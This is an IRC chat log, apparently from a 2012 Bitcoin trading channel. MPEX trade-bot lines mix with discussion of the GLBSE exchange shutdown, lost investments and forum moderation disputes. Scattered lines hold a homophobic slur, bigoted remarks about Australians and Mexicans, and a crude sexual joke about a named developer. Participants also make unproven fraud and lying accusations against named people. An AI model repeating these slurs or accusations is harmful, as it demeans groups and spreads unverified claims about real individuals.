[MPEX] [S.MPOE] 31268 @ 0.00031478 = 9.8425 BTC [+] Oct 08 22:24:28 [MPEX] [S.MPOE] 23800 @ 0.00031487 = 7.4939 BTC [+] Oct 08 22:24:30 [MPEX] [S.MPOE] 3641 @ 0.00031538 = 1.1483 BTC [+] Oct 08 22:25:17 what is a catastrophe? Oct 08 22:25:28 what drama did i miss now ;) Oct 08 22:25:38 a feline apostrophe Oct 08 22:25:57 JWU42 https://bitcointalk.org/index.php?topic=117235.0 Oct 08 22:26:02 [MPEX] [S.MPOE] 1 @ 0.00031437 BTC [-] Oct 08 22:26:32 Today's drama is nothing compared to tomorrow's one Oct 08 22:26:39 Got to love bitcoinland Oct 08 22:28:22 mircea_popescu: thanks Oct 08 22:38:28 [MPEX] [S.MPOE] 6 @ 0.00031437 = 0.0019 BTC [-] Oct 08 22:39:00 [MPEX] [S.MPOE] 8 @ 0.00031437 = 0.0025 BTC [-] Oct 08 22:40:19 [MPEX] [S.MPOE] 3 @ 0.00031437 = 0.0009 BTC [-] Oct 08 22:40:36 [MPEX] [S.MPOE] 9 @ 0.00031437 = 0.0028 BTC [-] Oct 08 22:40:52 [MPEX] [S.MPOE] 6 @ 0.00031437 = 0.0019 BTC [-] Oct 08 22:41:20 [MPEX] [S.MPOE] 6 @ 0.00031437 = 0.0019 BTC [-] Oct 08 22:42:06 [MPEX] [S.MPOE] 5 @ 0.00031437 = 0.0016 BTC [-] Oct 08 22:42:24 [MPEX] [S.MPOE] 5 @ 0.00031437 = 0.0016 BTC [-] Oct 08 22:43:03 [MPEX] [S.MPOE] 3 @ 0.00031437 = 0.0009 BTC [-] Oct 08 22:43:19 [MPEX] [S.MPOE] 3 @ 0.00031437 = 0.0009 BTC [-] Oct 08 22:43:35 haha wat Oct 08 22:44:22 [MPEX] [S.MPOE] 8 @ 0.00031437 = 0.0025 BTC [-] Oct 08 22:45:05 [MPEX] [S.MPOE] 5 @ 0.00031437 = 0.0016 BTC [-] Oct 08 22:46:02 Somebody broke his piggy Oct 08 22:46:37 [MPEX] [S.MPOE] 1 @ 0.00031437 BTC [-] Oct 08 22:47:38 [MPEX] [S.MPOE] 8 @ 0.00031437 = 0.0025 BTC [-] Oct 08 22:48:33 [MPEX] [S.MPOE] 8 @ 0.00031437 = 0.0025 BTC [-] Oct 08 22:50:01 [MPEX] [S.MPOE] 9 @ 0.00031437 = 0.0028 BTC [-] Oct 08 22:51:00 [MPEX] [S.MPOE] 6 @ 0.00031437 = 0.0019 BTC [-] Oct 08 22:51:30 would be great if theymos taged himself then left bitcoin entirely Oct 08 22:51:31 [MPEX] [S.MPOE] 8 @ 0.00031437 = 0.0025 BTC [-] Oct 08 22:52:21 dub it would be jawdropping. Oct 08 22:54:58 he really is the ultimate scammer Oct 08 23:01:08 [MPEX] [O.BTCUSD.P110T] 10 @ 0.097 = 0.97 BTC [-] Oct 08 23:03:06 [MPEX] [O.BTCUSD.P100T] 10 @ 0.06366671 = 0.6367 BTC [-] Oct 08 23:03:25 has nefario actually said anything yet? Oct 08 23:03:51 it'd depend on your definition of actually. Oct 08 23:03:59 lawyers normally shut people up Oct 08 23:04:45 Mommy I want my btc lol Oct 08 23:04:55 really I want my btc Oct 08 23:05:04 I mean, https://bitcointalk.org/index.php?topic=115669.msg1256541#msg1256541, this guy is a forum moderator Oct 08 23:05:04 and assets Oct 08 23:05:23 no further proof of theymos intent to continue to destroy bitcoins credibility is needed Oct 08 23:07:23 smoothie still owes me $550 USD on halloween Oct 08 23:07:34 i sold him $11 bitcoins months ago Oct 08 23:08:02 its like he illicits applications for moderator positions (already a broken model) and selects only the most stupid applicants Oct 08 23:08:40 thank you dub ;) Oct 08 23:08:55 Timmy Oct 08 23:08:56 you are a mod? Oct 08 23:08:58 yes Oct 08 23:09:05 shame Oct 08 23:09:25 I used to be a better place Oct 08 23:09:32 *it Oct 08 23:10:07 If I were you I would relinquish it or face further reputation taint Oct 08 23:10:39 [MPEX] [O.BTCUSD.P090T] 20 @ 0.038 = 0.76 BTC [-] Oct 08 23:11:04 I have nothing to do with theymos actions Oct 08 23:21:48 [MPEX] [S.MPOE] 1 @ 0.000315 BTC [+] Oct 08 23:21:49 [MPEX] [S.MPOE] 1999 @ 0.00031538 = 0.6304 BTC [+] Oct 08 23:21:50 [MPEX] [S.MPOE] 8000 @ 0.00031544 = 2.5235 BTC [+] Oct 08 23:46:58 [MPEX] [S.MPOE] 10000 @ 0.00031438 = 3.1438 BTC [-] Oct 08 23:46:59 [MPEX] [S.MPOE] 7157 @ 0.00031437 = 2.2499 BTC [-] Oct 08 23:47:00 [MPEX] [S.MPOE] 34975 @ 0.00031433 = 10.9937 BTC [-] Oct 09 00:03:01 anyone else still have a tab open on ther glbse portfolio? Oct 09 00:03:24 I like to look at it some times and admire my DMC share Oct 09 00:03:29 ;;seen nefario Oct 09 00:03:29 nefario was last seen in #bitcoin-assets 2 weeks, 0 days, 1 hour, 3 minutes, and 29 seconds ago: Those assets are not listed or traded anymore Oct 09 00:12:07 [MPEX] [S.MPOE] 1825 @ 0.00031433 = 0.5737 BTC [-] Oct 09 00:12:09 [MPEX] [S.MPOE] 7475 @ 0.00031401 = 2.3472 BTC [-] Oct 09 00:37:29 [MPEX] [S.MPOE] 9000 @ 0.00031401 = 2.8261 BTC [-] Oct 09 00:37:55 [MPEX] [S.DICE] 1000 @ 0.00180001 = 1.8 BTC [+] Oct 09 00:46:32 famous last words Oct 09 00:46:54 ;;seen nefario Oct 09 00:46:55 nefario was last seen in #bitcoin-assets 2 weeks, 0 days, 1 hour, 46 minutes, and 55 seconds ago: Those assets are not listed or traded anymore Oct 09 00:47:59 hehe Oct 09 00:48:35 I like to look at it some times and admire my DMC share Oct 09 00:49:26 ewps Oct 09 00:49:50 just noticed this 6 slot pcie expansion chassis sitting in a rack Oct 09 00:50:08 need to steal it Oct 09 00:52:54 [MPEX] [S.MPOE] 383 @ 0.00031401 = 0.1203 BTC [-] Oct 09 00:53:42 one of these http://www.amplicon.com/IPC/product/PCI-Rackmount-MAGMA-2903.cfm Oct 09 00:55:32 [MPEX] [S.MPOE] 500 @ 0.00031401 = 0.157 BTC [-] Oct 09 00:57:56 strewth brendio is in australia Oct 09 00:58:02 [MPEX] [S.MPOE] 1000 @ 0.00031401 = 0.314 BTC [-] Oct 09 00:59:07 [MPEX] [S.MPOE] 1742 @ 0.00031401 = 0.547 BTC [-] Oct 09 01:06:08 [MPEX] [S.BVPS] 103 @ 0.00345638 = 0.356 BTC [-] Oct 09 01:06:09 [MPEX] [S.BVPS] 300 @ 0.00338731 = 1.0162 BTC [-] Oct 09 01:06:11 [MPEX] [S.BVPS] 250 @ 0.00338161 = 0.8454 BTC [-] Oct 09 01:06:12 [MPEX] [S.BVPS] 150 @ 0.0033425 = 0.5014 BTC [-] Oct 09 01:06:13 [MPEX] [S.BVPS] 123 @ 0.00333291 = 0.4099 BTC [-] Oct 09 01:06:14 [MPEX] [S.BVPS] 74 @ 0.00296003 = 0.219 BTC [-] Oct 09 01:06:57 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:07:43 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:07:44 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:08:21 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:08:21 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:08:32 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:12:07 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:12:15 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:12:18 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:12:22 [MPEX] [S.MPOE] 500 @ 0.00031274 = 0.1564 BTC [-] Oct 09 01:12:34 [MPEX] [S.MPOE] 1000 @ 0.00031274 = 0.3127 BTC [-] Oct 09 01:12:43 [MPEX] [S.MPOE] 1000 @ 0.00031274 = 0.3127 BTC [-] Oct 09 01:12:50 [MPEX] [S.MPOE] 1000 @ 0.00031274 = 0.3127 BTC [-] Oct 09 01:12:52 [MPEX] [S.MPOE] 1000 @ 0.00031274 = 0.3127 BTC [-] Oct 09 01:12:52 [MPEX] [S.MPOE] 1000 @ 0.00031274 = 0.3127 BTC [-] Oct 09 01:23:33 [MPEX] [S.MPOE] 1600 @ 0.00031274 = 0.5004 BTC [-] Oct 09 01:23:35 [MPEX] [S.MPOE] 4658 @ 0.00031203 = 1.4534 BTC [-] Oct 09 01:48:47 [MPEX] [S.MPOE] 14800 @ 0.00031406 = 4.6481 BTC [+] Oct 09 01:48:48 [MPEX] [S.MPOE] 3330 @ 0.00031438 = 1.0469 BTC [+] Oct 09 01:48:49 [MPEX] [S.MPOE] 49870 @ 0.00031606 = 15.7619 BTC [+] Oct 09 02:00:57 [MPEX] [S.DICE] 300 @ 0.00181 = 0.543 BTC [+] Oct 09 02:10:28 Wow did S.Dice really tank that much what the heck Oct 09 02:11:37 That's nothing. Today somebody sold some @0.0001 Oct 09 02:11:58 It's the panic Oct 09 02:12:25 What panic? Oct 09 02:12:36 All the panic Oct 09 02:12:54 It's been coumpounding for a while Oct 09 02:12:56 lemme guess the Nevada Gaming commision is going after Sdice Oct 09 02:13:20 I don't know which precisely is it anymore Oct 09 02:13:26 Haha Oct 09 02:13:37 What a mess. Oct 09 02:13:43 lol, probably Oct 09 02:13:58 I blame mircea_popescu for not specifically telling us so. Oct 09 02:14:17 Publish that on the forum, and somebody is selling it all the way down... Oct 09 02:14:31 Let me get a short position first Oct 09 02:14:31 heh get outta here Oct 09 02:14:41 Haha Oct 09 02:15:03 it's not located in nevada so it's ok, nefario's lawyer told me so. Oct 09 02:15:12 also, c0x. Oct 09 02:17:42 Well I'm happy to know that even if I do manage to get my shares transfered somewhere else they will have lost 75% or so of the value. Oct 09 02:20:18 Doffx win-win! Oct 09 02:20:30 ... Oct 09 02:26:09 [MPEX] [S.MPOE] 38700 @ 0.00031203 = 12.0756 BTC [-] Oct 09 02:43:31 so is it today yet ? Oct 09 02:44:13 It should be in the uk Oct 09 02:44:32 Anyway, there'll be a lot of today's, me think.... Oct 09 02:45:54 well, things are moving, albeit slowly. Oct 09 02:45:59 it is tomorrow just about Oct 09 02:46:27 Well... Oct 09 02:47:14 hi everybody Oct 09 02:47:17 B0g4r7_ BitcoinBaltar Bitcoinbear bitfoo blakdawg bonks brbot BTCHero Oct 09 02:47:18 bi BitcoinBaltar Oct 09 02:47:21 oops Oct 09 02:47:39 Maybe nefario is living his own groundhog day Oct 09 02:48:45 I think we all are living the groundhog day, it can't be a clusterfuck everyday. Surely it's the same clusterfuck happening over and over again.... Oct 09 02:51:21 [MPEX] [S.MPOE] 1600 @ 0.00031263 = 0.5002 BTC [+] Oct 09 02:51:23 [MPEX] [S.MPOE] 18142 @ 0.00031203 = 5.6608 BTC [-] Oct 09 02:51:28 rdponticelli tbh, the positive way to look at this is, time washing out the grime. Oct 09 02:52:12 Yeah, at some point it has to stop Oct 09 02:52:32 well there;'s not so very much left so. Oct 09 02:54:01 Anyway, nobody even dare to ask what else can happens... Oct 09 02:54:26 remote root in bitcoind Oct 09 02:54:30 film at 11 Oct 09 02:54:49 gavin found in bed with a live boy and dead girl Oct 09 02:55:51 lol Oct 09 02:56:22 rdponticelli well preeeeety much the only thing left is lets see... Oct 09 02:56:24 i guess mtgox. Oct 09 02:57:11 There's any tsunami alert? Oct 09 02:57:14 lol Oct 09 02:58:41 Anyway is useless, they're no alerts in bitcoin. Fuckups just falls from the sky... Oct 09 02:58:54 ding ding Oct 09 03:00:40 its rainin men^Wfuckups Oct 09 03:01:36 ^W lol. Oct 09 03:01:39 BURN HIM Oct 09 03:02:40 wait Oct 09 03:02:52 whats 25% of a satoshi? Oct 09 03:03:00 Please, don't burn anything. Anything burned would be and essential unknown piece of bitcoin, for sure Oct 09 03:03:05 how will I recoup my investment in DMC Oct 09 03:03:15 rdponticelli "MPOE-PR MPEX Representative Instigating FUD and Pedaling Illegal Immoral Service" Oct 09 03:03:20 there you have it. i'ma go pedal. Oct 09 03:03:26 lol Oct 09 03:04:25 Joy dub! You reached the bottom! You can't keep falling! Oct 09 03:05:43 That's the only joy, there's a low ground... Oct 09 03:05:54 Satoshi is there waiting for all us Oct 09 03:06:07 That's why it's called a satoshi Oct 09 03:06:27 you should start a church Oct 09 03:06:32 (actually im surprised nobody has) Oct 09 03:06:50 There was somebody... Oct 09 03:07:42 everyone quickly ignore jasinlee Oct 09 03:08:40 apparently the bump to 30 really hurt. Oct 09 03:10:10 can you see how many have you on ignore? Oct 09 03:10:41 who is bitcoin.me? changed alias at some stage? Oct 09 03:10:42 i think it;s something like 20 Oct 09 03:11:03 dub he's this douche that kept trying to shit on mpex. then it turned out he's a shill, owns(ed) glbse shares. Oct 09 03:11:13 i was not impressed. Oct 09 03:11:15 who? Oct 09 03:11:25 bitcoin.me Oct 09 03:11:31 oh, bitcoin.me? hes been trying to troll the dmc thread too Oct 09 03:11:33 pretty sure its someone who changed names Oct 09 03:11:37 showed up exactly when nefario locked dmc Oct 09 03:11:42 so Im thinking it actually IS nefario Oct 09 03:12:42 account is old tho. Oct 09 03:13:07 but he claims to be some dave from australia. Oct 09 03:13:15 and then theres puppet Oct 09 03:14:34 australians ftw Oct 09 03:14:59 what a genetic fuckup that is Oct 09 03:15:39 Diablo-D3: haha @ tealc :P Oct 09 03:15:50 an entire continent of people descended from the people the rest of the world threw out in the trash Oct 09 03:15:59 dub: america? Oct 09 03:16:11 my daughters are watching a nature show about deadly aussie animals Oct 09 03:16:18 well yes but Oct 09 03:16:23 BitcoinBear: thats all of australia Oct 09 03:16:40 yeah, pretty much Oct 09 03:16:48 [MPEX] [S.MPOE] 17858 @ 0.00031168 = 5.566 BTC [-] Oct 09 03:17:11 amuricans don't inhabit a whole continent Oct 09 03:17:29 yeah we kinda do Oct 09 03:17:51 canada is ex-english and ex-french Oct 09 03:17:55 we're ex-most of EU Oct 09 03:18:08 mexico is ex-spanish with the descendants of native rape victims Oct 09 03:18:56 it wouldn't be safe for glbse to pay to old btc addresses of customers would it ? Oct 09 03:19:02 mircea_popescu: no Oct 09 03:19:10 they can't just send balances to "last address" or w/e Oct 09 03:19:21 same reason SD is fucked up Oct 09 03:19:23 so what happens to all the people who don't claim ? Oct 09 03:19:23 no Oct 09 03:19:29 it cant tell the difference between change and real addresses Oct 09 03:19:34 nefario rapes tehm Oct 09 03:19:45 mircea_popescu: you mean unable to claim legally Oct 09 03:19:47 well wtf, this is why irl you have liquidators. Oct 09 03:19:53 this is kinda silly. Oct 09 03:20:01 this is fucking retarded, imo Oct 09 03:20:15 at least he could have waited until I was done shutting DMC down before he paniced Oct 09 03:20:31 dude this is the best outcome for you Oct 09 03:20:34 you get to walk Oct 09 03:20:40 free as a retarded bird Oct 09 03:20:47 dub on the other hand, im pretty sure mpoe.etf had some hundred btc in bidwalls at the time Oct 09 03:20:55 to try and unwind it. Oct 09 03:21:13 dub: doesnt mean its right Oct 09 03:21:48 argh, why cant nefario show his face and answer questions? Oct 09 03:22:00 cause he's a spineless little motherfucker? Oct 09 03:22:15 I guess he hadnt thought of how this would work Oct 09 03:22:31 BitcoinBear: who are you? Oct 09 03:22:37 he is almost as bad a planner as Dank Oct 09 03:22:39 forum noob. Oct 09 03:22:41 I have a pretty good idea how it iwll work Oct 09 03:22:44 ahh Oct 09 03:22:47 what do you mean? Oct 09 03:22:50 based on what he did with goat Oct 09 03:22:54 BitcoinBear: too many bears. Oct 09 03:22:55 Ukto im listening. Oct 09 03:23:00 i just told you Oct 09 03:23:04 :p Oct 09 03:23:06 :P Oct 09 03:23:36 I've been bitcoinbear on the forum for about a year or something Oct 09 03:24:00 so how do you like irc ? Oct 09 03:24:14 As I said before, when I was attempting to work with him to fixup gblse, I spent a month working with him, and I have a pretty good handle on how he deals with shit Oct 09 03:24:40 and based on what I have seen, i have a pretty good idea how he will handle the handing out of information Oct 09 03:24:55 sorta like strateman ? Oct 09 03:25:00 in a retarded and hopelessly broken manner Oct 09 03:25:01 it is nice to have current, real-time conversation, but I cant always sit online Oct 09 03:25:09 Unfortunately, there are some issues with his method, I hope he figured out sooner than later Oct 09 03:25:18 the codes shit doesnt work Oct 09 03:25:45 if you do it with enough unqieness it can Oct 09 03:26:10 problem is person resubmitting Oct 09 03:26:24 what do goats codes look like? are they easy to guess? Oct 09 03:26:54 mircea_popescu: I can work around that Oct 09 03:27:00 first off Oct 09 03:27:14 ppl shouldnt buy codes off of someone else Oct 09 03:27:23 nefario isnt trying to make a decentralized market Oct 09 03:27:25 ok. Oct 09 03:27:30 this can be granted. Oct 09 03:27:42 i dont know what hes smoking about not giving the codes to teh asset creator tho Oct 09 03:27:46 thats kinda the point Oct 09 03:27:52 so they can track who had what Oct 09 03:42:30 [MPEX] [S.MPOE] 587 @ 0.0003132 = 0.1838 BTC [+] Oct 09 03:46:32 .topic Oct 09 03:46:41 durrp Oct 09 04:01:12 Wait, what if everyone on the forums starts with a scammer tag, then if your ponzi scheme or exchange or investment or whatever lasts for more than 6 months (or 6 transactions), then you have to petition the mods to have the scammer tag removed? Oct 09 04:01:12 This way, you can tell who's a scammer immediately (it's everyone, everyone is a scammer). Oct 09 04:01:17 this is possibly a good idea Oct 09 04:02:03 well not a scammer tag Oct 09 04:02:05 but an untrusted tag Oct 09 04:02:21 maybe a newbie founder tag? Oct 09 04:02:26 tits or gtfo tag ? Oct 09 04:02:42 giga got the fuck out. Oct 09 04:02:50 lol Oct 09 04:03:04 mircea_popescu: my god Oct 09 04:03:06 I just had a hilarious idea Oct 09 04:03:14 STARTUP THE RPG Oct 09 04:03:21 hehe Oct 09 04:03:23 dub ;;topic Oct 09 04:03:24 it's what it is. Oct 09 04:03:26 you start as a lvl 1 founder Oct 09 04:03:27 nefario should just put his shit up, allowing only trasfers Oct 09 04:03:35 and.... grind 80 hours a week Oct 09 04:03:43 it's what we do. Oct 09 04:04:13 well, they say you're supposed to get back on the horse when your startup fails Oct 09 04:04:27 I mean, I know how the sausage is made, but Im not sure if I liked being the one making it Oct 09 04:07:39 [MPEX] [S.MPOE] 20212 @ 0.00031232 = 6.3126 BTC [-] Oct 09 04:10:42 [MPEX] [O.BTCUSD.P200T] 2 @ 0.61810948 = 1.2362 BTC [-] Oct 09 04:11:27 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.77852754 = 778.5275 BTC [+] Oct 09 04:12:06 [MPEX] [O.BTCUSD.P150T] 1 @ 0.3349582 BTC [+] Oct 09 04:12:07 [MPEX] [O.BTCUSD.P150T] 799 @ 0.33314565 = 266.1834 BTC [-] Oct 09 04:14:42 [MPEX] [O.BTCUSD.P190T] 1 @ 0.70264176 BTC [+] Oct 09 04:14:44 [MPEX] [O.BTCUSD.P190T] 879 @ 0.68945116 = 606.0276 BTC [-] Oct 09 04:15:48 ;;ticker Oct 09 04:15:49 Best bid: 11.84779, Best ask: 11.89999, Bid-ask spread: 0.05220, Last trade: 11.84779, 24 hour volume: 98309, 24 hour low: 10.621, 24 hour high: 11.95198 Oct 09 04:15:54 aha. back to 12 eh. Oct 09 04:16:38 [MPEX] [O.BTCUSD.P130T] 3 @ 0.20373372 = 0.6112 BTC [-] Oct 09 04:16:39 [MPEX] [O.BTCUSD.P130T] 818 @ 0.18796849 = 153.7582 BTC [-] Oct 09 04:16:53 [MPEX] [O.BTCUSD.P140T] 228 @ 0.24406928 = 55.6478 BTC [-] Oct 09 04:17:33 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.23166842 = 231.6684 BTC [-] Oct 09 04:18:09 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.1742641 = 174.2641 BTC [-] Oct 09 04:44:02 [MPEX] [S.MPOE] 3400 @ 0.00031456 = 1.0695 BTC [+] Oct 09 05:04:09 [MPEX] [O.BTCUSD.P200T] 713 @ 0.77852754 = 555.0901 BTC [+] Oct 09 05:04:17 [MPEX] [O.BTCUSD.P150T] 387 @ 0.33314565 = 128.9274 BTC [-] Oct 09 05:05:05 [MPEX] [O.BTCUSD.C100T] 812 @ 0.23148323 = 187.9644 BTC [-] Oct 09 05:29:08 He washed his hands of all responsibility the moment that nefario (I spit and use hand gestures to ward off evil when I type that name!) Oct 09 05:29:11 lmao loup cracks me up Oct 09 05:30:08 [MPEX] [S.MPOE] 10200 @ 0.00031427 = 3.2056 BTC [-] Oct 09 05:32:40 he's a faggot Oct 09 05:33:12 not that there's anything wrong with that. Oct 09 05:33:18 and a disgusting frenchman Oct 09 05:34:06 and a werewolf Oct 09 05:35:03 [MPEX] [O.BTCUSD.C100T] 794 @ 0.23137224 = 183.7096 BTC [-] Oct 09 05:35:13 i doubt he's french Oct 09 05:35:27 canadian, same difference Oct 09 05:38:15 haha not nearly Oct 09 05:38:26 but alas, to omuch excitement for one day. catch you all tomorrow for more! Oct 09 05:39:51 [10:29:01] He washed his hands of all responsibility the moment that nefario (I spit and use hand gestures to ward off evil when I type that name!) Oct 09 05:39:53 no no no Oct 09 05:40:07 you have to spit and then turn around in a circle 3 times **** BEGIN LOGGING AT Tue Oct 9 17:01:11 2012 Oct 09 17:02:56 mircea_popescu: I'm curious, has MPEX traffic increased since glbse went down? if so by how much? :p Oct 09 17:04:37 not significantly. Oct 09 17:04:44 boring Oct 09 17:05:06 it had a lot of trafic to begin with lol Oct 09 17:05:47 ;;ticker Oct 09 17:05:47 Best bid: 12.15251, Best ask: 12.2, Bid-ask spread: 0.04749, Last trade: 12.15251, 24 hour volume: 59176, 24 hour low: 10.97, 24 hour high: 12.35 Oct 09 17:06:00 o hey. Oct 09 17:26:15 [MPEX] [S.MPOE] 6128 @ 0.0003132 = 1.9193 BTC [-] Oct 09 17:26:15 [MPEX] [S.MPOE] 58000 @ 0.00031291 = 18.1488 BTC [-] Oct 09 17:43:01 mircea_popescu: have you talked to nefario about s.dice PT shares and how to clean up this mess? Oct 09 17:43:16 nope. he's not been on irc in 2 weeks Oct 09 17:43:23 e.mail? Oct 09 17:43:29 hasn't emailed either. Oct 09 17:43:50 logically there's little i can do anyway or little reason to contact me Oct 09 17:44:09 the pt was run by deadterra on glbse, he'd likely have to get the lists of his new customers Oct 09 17:44:11 i think Oct 09 17:44:18 i mean, what'd i do ? Oct 09 17:51:16 [MPEX] [S.MPOE] 10600 @ 0.00031209 = 3.3082 BTC [-] Oct 09 17:51:18 [MPEX] [S.MPOE] 13297 @ 0.00031204 = 4.1492 BTC [-] Oct 09 18:11:54 EskimoBob so did glbse send any money yet or anything ? Oct 09 18:14:08 lolat why nefario got scammers tag Oct 09 18:14:23 its seems only cuz he screwed over glbse (theymos) stock holders Oct 09 18:14:33 not cuz he fucked over glbse customers... Oct 09 18:14:52 duh. Oct 09 18:15:05 well Oct 09 18:15:09 theymos is completely untrustworthy at this point Oct 09 18:15:22 especially given that his confederate that anon bitcoin.me guy said he KNEW before selling Oct 09 18:15:27 i thought badbear would have not be so clear about only protecting theymoses investments Oct 09 18:15:29 that nefario was planning to throw you off Oct 09 18:15:38 i thought he would ahve said some bs about protect custimers or what not Oct 09 18:16:01 oh lol Oct 09 18:16:05 i did not know about that Oct 09 18:16:09 is there link or logs? Oct 09 18:16:13 https://bitcointalk.org/index.php?topic=117235.msg1259176#msg1259176 Oct 09 18:16:20 cuz if theymos knew about it... Oct 09 18:16:22 [MPEX] [S.MPOE] 3700 @ 0.00031231 = 1.1555 BTC [+] Oct 09 18:16:23 make a screencap or quote it Oct 09 18:16:26 What's funnier is that theymos was the one who requested the pirate passthroughs Oct 09 18:16:28 because they've been deleting the girl's posts Oct 09 18:16:34 [11:15] especially given that his confederate that anon bitcoin.me guy said he KNEW before selling Oct 09 18:16:35 (also loup garoux and burtw) Oct 09 18:16:37 told you that was sketchy Oct 09 18:16:41 rg yup Oct 09 18:16:51 everyone was like ohh noo Oct 09 18:16:52 its ok Oct 09 18:16:55 rdponticelli i guess a buncha people did. Oct 09 18:16:57 hes been trying to sell Oct 09 18:16:58 theymos (or someone) deleated a few of my posts.. Oct 09 18:17:02 yeah... trying to sell a week cause he knew Oct 09 18:17:08 Chaang-Noi: it happens to me all the time Oct 09 18:17:14 Chaang-Noi http://polimedia.us/dtng/c/src/134974765464.png find that post on btctalk.org Oct 09 18:17:17 theyre not supposed to delete threads Oct 09 18:17:20 unless theyre misposted Oct 09 18:17:21 they killed like, an entire convo. Oct 09 18:17:32 yaya well, they didn' delete threads, just a bucnha posts in one Oct 09 18:17:56 that does not mean theymos knew that i was going to be kicked off before it happened Oct 09 18:18:03 neither burt's, nor the one who quotes, nor the one who the quoted one responds to are there anymore. Oct 09 18:18:04 just that he sold after he knew Oct 09 18:18:11 well if he sold after he knew Oct 09 18:18:16 and he sold before you were kicked.., Oct 09 18:18:19 remember, they sold on 24th Oct 09 18:18:23 you were kicked 25th Oct 09 18:18:48 oh wow Oct 09 18:18:50 right ? Oct 09 18:18:55 and theymos himself said he had no ideea Oct 09 18:19:01 well did bitcoin.me join the org sale or did he join later? Oct 09 18:19:02 but this is a lie. pure and simple. Oct 09 18:19:09 well if he joinedf later Oct 09 18:19:12 yeah theymos said he did not know Oct 09 18:19:16 wouldn't the total % sold have to increase ? Oct 09 18:19:20 but bitcoin.me could have joined wanting to sell later Oct 09 18:19:25 i mean, i sell 23%, and some person joins the sale Oct 09 18:19:28 i still sell 23% ? Oct 09 18:19:35 yeah i understand what you are saying Oct 09 18:19:39 well so. Oct 09 18:19:48 but its not like black and white Oct 09 18:19:58 seems pretty black and white to me. Oct 09 18:20:07 yeah, it does not look good Oct 09 18:20:15 at any rate, it certainly ain't white. Oct 09 18:20:31 you know what they say, a bottle of wine with a drop of piss added is a bottle of piss. Oct 09 18:20:33 are the irc logs public? Oct 09 18:20:39 mostly. Oct 09 18:20:47 iv not seen any Oct 09 18:20:53 i mena the one bitcoin.me is talking about Oct 09 18:20:53 o you mean published ? Oct 09 18:20:57 yeah Oct 09 18:20:58 uh i dunno Oct 09 18:21:03 ok Oct 09 18:21:18 in general the rule is, he who references irc logs has to link to source. Oct 09 18:22:29 well its a fucking mess Oct 09 18:22:40 this whole thing more or less showed this forum is worthless Oct 09 18:22:50 i lost a lot of respect for theymos and staff... Oct 09 18:23:04 maged even threatoned me, then i made that publc and he resigned the investigation Oct 09 18:23:07 fucking assholes Oct 09 18:24:01 evening :) Oct 09 18:25:57 hi Oct 09 18:27:53 "mircea_popescu | EskimoBob so did glbse send any money yet or anything ?" - I have not received anything Oct 09 18:30:38 just printed http://shrani.si/f/3i/yn/2V60I68q/bit.jpg Oct 09 18:30:46 smells like... regular paper. Oct 09 18:31:09 bitcoin.me was the one who called me a scammer for "taking atvantage of nefarios good will" Oct 09 18:31:13 what a cunt Oct 09 18:31:24 looks awesome kakobrekla Oct 09 18:31:41 can i see unedited photos? :) Oct 09 18:31:49 :> Oct 09 18:31:57 well accualy you could Oct 09 18:32:03 the one on top is sampe Oct 09 18:32:05 sample Oct 09 18:32:35 i was just kidding Oct 09 18:32:54 i really hate the lack of nice designs for this sit Oct 09 18:32:56 shit Oct 09 18:33:19 i agree kakobrekla Oct 09 18:33:21 and www.bitaddress.org is not printer friendly at all Oct 09 18:33:21 goat realize i blame you for everything Oct 09 18:33:29 this needs to be redone Oct 09 18:33:30 i donated to that cause Oct 09 18:33:39 everything that has went wrong...you were involved in it.... Oct 09 18:33:45 its better than i could do Oct 09 18:33:56 i have been involved in everything that has gone wrong Oct 09 18:34:05 yes, you have Oct 09 18:34:07 bitcoinica... pirate... glbse... Oct 09 18:34:16 seems like a fucking pattern of fail Oct 09 18:34:21 iv been massivly fucked Oct 09 18:34:39 i lost over $100,000 usd in the last year and all my time... Oct 09 18:34:57 i would have done well if i just held... Oct 09 18:35:03 or atleast be on the good side... Oct 09 18:36:13 and now i have bs liabilities cuz of nefario Oct 09 18:36:23 and i guess theymos too Oct 09 18:36:35 maybe it's time to make a new name Oct 09 18:36:38 the guy who admited to reading pms on the forum... Oct 09 18:36:45 and reinvent yourself as a next level scammer Oct 09 18:36:50 make a new name? fuck that... ill just leave the forum... Oct 09 18:37:06 lol if im a scammer im doing it wrong Oct 09 18:37:20 me too Oct 09 18:37:21 im not anon i doxed myself when i did tygrr tech Oct 09 18:41:44 [MPEX] [S.MPOE] 50020 @ 0.00031204 = 15.6082 BTC [-] Oct 09 18:53:25 You dont have a scammer tag do you Chaang-Noi? Oct 09 18:54:10 no Oct 09 18:54:14 why would i? Oct 09 18:54:52 That's why I asked, didnt think you should, but you definitely have been caught in the middle of a bunch Oct 09 18:55:26 There's an irony there somewhere, id bet most people would have bet you would have been the scammer haha Oct 09 18:57:47 Even if I get the asset I own the most of back, I bought it at .0032, I could now sell it at 0.00181001 Oct 09 18:57:52 Makes me sad. Oct 09 18:59:42 i know Oct 09 18:59:56 most people think im the scammer yet i keep getting fucked by trusted community memebers Oct 09 19:03:58 Man, I cant imgine losing 100k, I could do everything I wanted in my current plans and pay off all my debt and still have some left over if I got 100k Oct 09 19:07:19 [MPEX] [S.MPOE] 5783 @ 0.00031204 = 1.8045 BTC [-] Oct 09 19:07:20 [MPEX] [S.MPOE] 27859 @ 0.00031198 = 8.6915 BTC [-] Oct 09 19:07:22 [MPEX] [S.MPOE] 1000 @ 0.00031162 = 0.3116 BTC [-] Oct 09 19:07:23 [MPEX] [S.MPOE] 5993 @ 0.00031158 = 1.8673 BTC [-] Oct 09 19:07:24 [MPEX] [S.MPOE] 15859 @ 0.0003115 = 4.9401 BTC [-] 